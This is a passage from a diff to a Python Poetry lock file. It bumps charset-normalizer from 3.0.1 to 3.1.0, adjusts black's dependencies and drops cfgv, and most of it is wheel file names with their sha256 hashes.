+ {file = "black-23.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2a951cc83ab535d248c89f300eccbd625e80ab880fbcfb5ac8afb5f01a258ac9"},
+ {file = "black-23.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:0680d4380db3719ebcfb2613f34e86c8e6d15ffeabcf8ec59355c5e7b85bb555"},
+ {file = "black-23.1.0-py3-none-any.whl", hash = "sha256:7a0f701d314cfa0896b9001df70a530eb2472babb76086344e688829efd97d32"},
+ {file = "black-23.1.0.tar.gz", hash = "sha256:b0bd97bea8903f5a2ba7219257a44e3f1f9d00073d6cc1add68f0beec69692ac"},
]
[package.dependencies]
click = ">=8.0.0"
mypy-extensions = ">=0.4.3"
+packaging = ">=22.0"
pathspec = ">=0.9.0"
platformdirs = ">=2"
-tomli = {version = ">=1.1.0", markers = "python_full_version < \"3.11.0a7\""}
+tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""}
typed-ast = {version = ">=1.4.2", markers = "python_version < \"3.8\" and implementation_name == \"cpython\""}
typing-extensions = {version = ">=3.10.0.0", markers = "python_version < \"3.10\""}
@@ -126,114 +140,89 @@ files = [
{file = "certifi-2022.12.7.tar.gz", hash = "sha256:35824b4c3a97115964b408844d64aa14db1cc518f6562e8d7261699d1350a9e3"},
]
-[[package]]
-name = "cfgv"
-version = "3.3.1"
-description = "Validate configuration and produce human readable error messages."
-category = "dev"
-optional = false
-python-versions = ">=3.6.1"
-files = [
- {file = "cfgv-3.3.1-py2.py3-none-any.whl", hash = "sha256:c6a0883f3917a037485059700b9e75da2464e6c27051014ad85ba6aaa5884426"},
- {file = "cfgv-3.3.1.tar.gz", hash = "sha256:f5a830efb9ce7a445376bb66ec94c638a9787422f96264c98edc6bdeed8ab736"},
-]
-
[[package]]
name = "charset-normalizer"
-version = "3.0.1"
+version = "3.1.0"
description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet."
category = "dev"
optional = false
-python-versions = "*"
+python-versions = ">=3.7.0"
files = [
- {file = "charset-normalizer-3.0.1.tar.gz", hash = "sha256:ebea339af930f8ca5d7a699b921106c6e29c617fe9606fa7baa043c1cdae326f"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:88600c72ef7587fe1708fd242b385b6ed4b8904976d5da0893e31df8b3480cb6"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c75ffc45f25324e68ab238cb4b5c0a38cd1c3d7f1fb1f72b5541de469e2247db"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:db72b07027db150f468fbada4d85b3b2729a3db39178abf5c543b784c1254539"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:62595ab75873d50d57323a91dd03e6966eb79c41fa834b7a1661ed043b2d404d"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ff6f3db31555657f3163b15a6b7c6938d08df7adbfc9dd13d9d19edad678f1e8"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:772b87914ff1152b92a197ef4ea40efe27a378606c39446ded52c8f80f79702e"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:70990b9c51340e4044cfc394a81f614f3f90d41397104d226f21e66de668730d"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:292d5e8ba896bbfd6334b096e34bffb56161c81408d6d036a7dfa6929cff8783"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:2edb64ee7bf1ed524a1da60cdcd2e1f6e2b4f66ef7c077680739f1641f62f555"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:31a9ddf4718d10ae04d9b18801bd776693487cbb57d74cc3458a7673f6f34639"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:44ba614de5361b3e5278e1241fda3dc1838deed864b50a10d7ce92983797fa76"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:12db3b2c533c23ab812c2b25934f60383361f8a376ae272665f8e48b88e8e1c6"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:c512accbd6ff0270939b9ac214b84fb5ada5f0409c44298361b2f5e13f9aed9e"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-win32.whl", hash = "sha256:502218f52498a36d6bf5ea77081844017bf7982cdbe521ad85e64cabee1b608b"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-win_amd64.whl", hash = "sha256:601f36512f9e28f029d9481bdaf8e89e5148ac5d89cffd3b05cd533eeb423b59"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:0298eafff88c99982a4cf66ba2efa1128e4ddaca0b05eec4c456bbc7db691d8d"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:a8d0fc946c784ff7f7c3742310cc8a57c5c6dc31631269876a88b809dbeff3d3"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:87701167f2a5c930b403e9756fab1d31d4d4da52856143b609e30a1ce7160f3c"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:14e76c0f23218b8f46c4d87018ca2e441535aed3632ca134b10239dfb6dadd6b"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:0c0a590235ccd933d9892c627dec5bc7511ce6ad6c1011fdf5b11363022746c1"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8c7fe7afa480e3e82eed58e0ca89f751cd14d767638e2550c77a92a9e749c317"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:79909e27e8e4fcc9db4addea88aa63f6423ebb171db091fb4373e3312cb6d603"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8ac7b6a045b814cf0c47f3623d21ebd88b3e8cf216a14790b455ea7ff0135d18"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:72966d1b297c741541ca8cf1223ff262a6febe52481af742036a0b296e35fa5a"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:f9d0c5c045a3ca9bedfc35dca8526798eb91a07aa7a2c0fee134c6c6f321cbd7"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:5995f0164fa7df59db4746112fec3f49c461dd6b31b841873443bdb077c13cfc"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:4a8fcf28c05c1f6d7e177a9a46a1c52798bfe2ad80681d275b10dcf317deaf0b"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:761e8904c07ad053d285670f36dd94e1b6ab7f16ce62b9805c475b7aa1cffde6"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-win32.whl", hash = "sha256:71140351489970dfe5e60fc621ada3e0f41104a5eddaca47a7acb3c1b851d6d3"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-win_amd64.whl", hash = "sha256:9ab77acb98eba3fd2a85cd160851816bfce6871d944d885febf012713f06659c"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:84c3990934bae40ea69a82034912ffe5a62c60bbf6ec5bc9691419641d7d5c9a"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:74292fc76c905c0ef095fe11e188a32ebd03bc38f3f3e9bcb85e4e6db177b7ea"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c95a03c79bbe30eec3ec2b7f076074f4281526724c8685a42872974ef4d36b72"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f4c39b0e3eac288fedc2b43055cfc2ca7a60362d0e5e87a637beac5d801ef478"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:df2c707231459e8a4028eabcd3cfc827befd635b3ef72eada84ab13b52e1574d"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:93ad6d87ac18e2a90b0fe89df7c65263b9a99a0eb98f0a3d2e079f12a0735837"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:59e5686dd847347e55dffcc191a96622f016bc0ad89105e24c14e0d6305acbc6"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:cd6056167405314a4dc3c173943f11249fa0f1b204f8b51ed4bde1a9cd1834dc"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_ppc64le.whl", hash = "sha256:083c8d17153ecb403e5e1eb76a7ef4babfc2c48d58899c98fcaa04833e7a2f9a"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_s390x.whl", hash = "sha256:f5057856d21e7586765171eac8b9fc3f7d44ef39425f85dbcccb13b3ebea806c"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:7eb33a30d75562222b64f569c642ff3dc6689e09adda43a082208397f016c39a"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-win32.whl", hash = "sha256:95dea361dd73757c6f1c0a1480ac499952c16ac83f7f5f4f84f0658a01b8ef41"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-win_amd64.whl", hash = "sha256:eaa379fcd227ca235d04152ca6704c7cb55564116f8bc52545ff357628e10602"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:3e45867f1f2ab0711d60c6c71746ac53537f1684baa699f4f668d4c6f6ce8e14"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cadaeaba78750d58d3cc6ac4d1fd867da6fc73c88156b7a3212a3cd4819d679d"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:911d8a40b2bef5b8bbae2e36a0b103f142ac53557ab421dc16ac4aafee6f53dc"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:503e65837c71b875ecdd733877d852adbc465bd82c768a067badd953bf1bc5a3"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a60332922359f920193b1d4826953c507a877b523b2395ad7bc716ddd386d866"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:16a8663d6e281208d78806dbe14ee9903715361cf81f6d4309944e4d1e59ac5b"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:a16418ecf1329f71df119e8a65f3aa68004a3f9383821edcb20f0702934d8087"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:9d9153257a3f70d5f69edf2325357251ed20f772b12e593f3b3377b5f78e7ef8"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:02a51034802cbf38db3f89c66fb5d2ec57e6fe7ef2f4a44d070a593c3688667b"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:2e396d70bc4ef5325b72b593a72c8979999aa52fb8bcf03f701c1b03e1166918"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:11b53acf2411c3b09e6af37e4b9005cba376c872503c8f28218c7243582df45d"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-win32.whl", hash = "sha256:0bf2dae5291758b6f84cf923bfaa285632816007db0330002fa1de38bfcb7154"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-win_amd64.whl", hash = "sha256:2c03cc56021a4bd59be889c2b9257dae13bf55041a3372d3295416f86b295fb5"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:024e606be3ed92216e2b6952ed859d86b4cfa52cd5bc5f050e7dc28f9b43ec42"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:4b0d02d7102dd0f997580b51edc4cebcf2ab6397a7edf89f1c73b586c614272c"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:358a7c4cb8ba9b46c453b1dd8d9e431452d5249072e4f56cfda3149f6ab1405e"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:81d6741ab457d14fdedc215516665050f3822d3e56508921cc7239f8c8e66a58"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:8b8af03d2e37866d023ad0ddea594edefc31e827fee64f8de5611a1dbc373174"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9cf4e8ad252f7c38dd1f676b46514f92dc0ebeb0db5552f5f403509705e24753"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e696f0dd336161fca9adbb846875d40752e6eba585843c768935ba5c9960722b"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c22d3fe05ce11d3671297dc8973267daa0f938b93ec716e12e0f6dee81591dc1"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:109487860ef6a328f3eec66f2bf78b0b72400280d8f8ea05f69c51644ba6521a"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:37f8febc8ec50c14f3ec9637505f28e58d4f66752207ea177c1d67df25da5aed"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:f97e83fa6c25693c7a35de154681fcc257c1c41b38beb0304b9c4d2d9e164479"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:a152f5f33d64a6be73f1d30c9cc82dfc73cec6477ec268e7c6e4c7d23c2d2291"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:39049da0ffb96c8cbb65cbf5c5f3ca3168990adf3551bd1dee10c48fce8ae820"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-win32.whl", hash = "sha256:4457ea6774b5611f4bed5eaa5df55f70abde42364d498c5134b7ef4c6958e20e"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-win_amd64.whl", hash = "sha256:e62164b50f84e20601c1ff8eb55620d2ad25fb81b59e3cd776a1902527a788af"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8eade758719add78ec36dc13201483f8e9b5d940329285edcd5f70c0a9edbd7f"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:8499ca8f4502af841f68135133d8258f7b32a53a1d594aa98cc52013fff55678"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3fc1c4a2ffd64890aebdb3f97e1278b0cc72579a08ca4de8cd2c04799a3a22be"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:00d3ffdaafe92a5dc603cb9bd5111aaa36dfa187c8285c543be562e61b755f6b"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c2ac1b08635a8cd4e0cbeaf6f5e922085908d48eb05d44c5ae9eabab148512ca"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f6f45710b4459401609ebebdbcfb34515da4fc2aa886f95107f556ac69a9147e"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3ae1de54a77dc0d6d5fcf623290af4266412a7c4be0b1ff7444394f03f5c54e3"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3b590df687e3c5ee0deef9fc8c547d81986d9a1b56073d82de008744452d6541"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ab5de034a886f616a5668aa5d098af2b5385ed70142090e2a31bcbd0af0fdb3d"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9cb3032517f1627cc012dbc80a8ec976ae76d93ea2b5feaa9d2a5b8882597579"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:608862a7bf6957f2333fc54ab4399e405baad0163dc9f8d99cb236816db169d4"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:0f438ae3532723fb6ead77e7c604be7c8374094ef4ee2c5e03a3a17f1fca256c"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:356541bf4381fa35856dafa6a965916e54bed415ad8a24ee6de6e37deccf2786"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-win32.whl", hash = "sha256:39cf9ed17fe3b1bc81f33c9ceb6ce67683ee7526e65fde1447c772afc54a1bb8"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-win_amd64.whl", hash = "sha256:0a11e971ed097d24c534c037d298ad32c6ce81a45736d31e0ff0ad37ab437d59"},
- {file = "charset_normalizer-3.0.1-py3-none-any.whl", hash = "sha256:7e189e2e1d3ed2f4aebabd2d5b0f931e883676e51c7624826e0a4e5fe8a0bf24"},
+ {file = "charset-normalizer-3.1.0.tar.gz", hash = "sha256:34e0a2f9c370eb95597aae63bf85eb5e96826d81e3dcf88b8886012906f509b5"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:e0ac8959c929593fee38da1c2b64ee9778733cdf03c482c9ff1d508b6b593b2b"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d7fc3fca01da18fbabe4625d64bb612b533533ed10045a2ac3dd194bfa656b60"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:04eefcee095f58eaabe6dc3cc2262f3bcd776d2c67005880894f447b3f2cb9c1"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:20064ead0717cf9a73a6d1e779b23d149b53daf971169289ed2ed43a71e8d3b0"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1435ae15108b1cb6fffbcea2af3d468683b7afed0169ad718451f8db5d1aff6f"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c84132a54c750fda57729d1e2599bb598f5fa0344085dbde5003ba429a4798c0"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:75f2568b4189dda1c567339b48cba4ac7384accb9c2a7ed655cd86b04055c795"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:11d3bcb7be35e7b1bba2c23beedac81ee893ac9871d0ba79effc7fc01167db6c"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:891cf9b48776b5c61c700b55a598621fdb7b1e301a550365571e9624f270c203"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:5f008525e02908b20e04707a4f704cd286d94718f48bb33edddc7d7b584dddc1"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:b06f0d3bf045158d2fb8837c5785fe9ff9b8c93358be64461a1089f5da983137"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:49919f8400b5e49e961f320c735388ee686a62327e773fa5b3ce6721f7e785ce"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:22908891a380d50738e1f978667536f6c6b526a2064156203d418f4856d6e86a"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-win32.whl", hash = "sha256:12d1a39aa6b8c6f6248bb54550efcc1c38ce0d8096a146638fd4738e42284448"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:65ed923f84a6844de5fd29726b888e58c62820e0769b76565480e1fdc3d062f8"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:9a3267620866c9d17b959a84dd0bd2d45719b817245e49371ead79ed4f710d19"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:6734e606355834f13445b6adc38b53c0fd45f1a56a9ba06c2058f86893ae8017"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:f8303414c7b03f794347ad062c0516cee0e15f7a612abd0ce1e25caf6ceb47df"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:aaf53a6cebad0eae578f062c7d462155eada9c172bd8c4d250b8c1d8eb7f916a"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3dc5b6a8ecfdc5748a7e429782598e4f17ef378e3e272eeb1340ea57c9109f41"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:e1b25e3ad6c909f398df8921780d6a3d120d8c09466720226fc621605b6f92b1"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0ca564606d2caafb0abe6d1b5311c2649e8071eb241b2d64e75a0d0065107e62"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b82fab78e0b1329e183a65260581de4375f619167478dddab510c6c6fb04d9b6"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:bd7163182133c0c7701b25e604cf1611c0d87712e56e88e7ee5d72deab3e76b5"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:11d117e6c63e8f495412d37e7dc2e2fff09c34b2d09dbe2bee3c6229577818be"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:cf6511efa4801b9b38dc5546d7547d5b5c6ef4b081c60b23e4d941d0eba9cbeb"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:abc1185d79f47c0a7aaf7e2412a0eb2c03b724581139193d2d82b3ad8cbb00ac"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:cb7b2ab0188829593b9de646545175547a70d9a6e2b63bf2cd87a0a391599324"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-win32.whl", hash = "sha256:c36bcbc0d5174a80d6cccf43a0ecaca44e81d25be4b7f90f0ed7bcfbb5a00909"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:cca4def576f47a09a943666b8f829606bcb17e2bc2d5911a46c8f8da45f56755"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0c95f12b74681e9ae127728f7e5409cbbef9cd914d5896ef238cc779b8152373"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fca62a8301b605b954ad2e9c3666f9d97f63872aa4efcae5492baca2056b74ab"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ac0aa6cd53ab9a31d397f8303f92c42f534693528fafbdb997c82bae6e477ad9"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c3af8e0f07399d3176b179f2e2634c3ce9c1301379a6b8c9c9aeecd481da494f"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a5fc78f9e3f501a1614a98f7c54d3969f3ad9bba8ba3d9b438c3bc5d047dd28"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:628c985afb2c7d27a4800bfb609e03985aaecb42f955049957814e0491d4006d"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:74db0052d985cf37fa111828d0dd230776ac99c740e1a758ad99094be4f1803d"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:1e8fcdd8f672a1c4fc8d0bd3a2b576b152d2a349782d1eb0f6b8e52e9954731d"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:04afa6387e2b282cf78ff3dbce20f0cc071c12dc8f685bd40960cc68644cfea6"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:dd5653e67b149503c68c4018bf07e42eeed6b4e956b24c00ccdf93ac79cdff84"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d2686f91611f9e17f4548dbf050e75b079bbc2a82be565832bc8ea9047b61c8c"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-win32.whl", hash = "sha256:4155b51ae05ed47199dc5b2a4e62abccb274cee6b01da5b895099b61b1982974"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:322102cdf1ab682ecc7d9b1c5eed4ec59657a65e1c146a0da342b78f4112db23"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:e633940f28c1e913615fd624fcdd72fdba807bf53ea6925d6a588e84e1151531"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3a06f32c9634a8705f4ca9946d667609f52cf130d5548881401f1eb2c39b1e2c"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:7381c66e0561c5757ffe616af869b916c8b4e42b367ab29fedc98481d1e74e14"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3573d376454d956553c356df45bb824262c397c6e26ce43e8203c4c540ee0acb"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e89df2958e5159b811af9ff0f92614dabf4ff617c03a4c1c6ff53bf1c399e0e1"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:78cacd03e79d009d95635e7d6ff12c21eb89b894c354bd2b2ed0b4763373693b"},
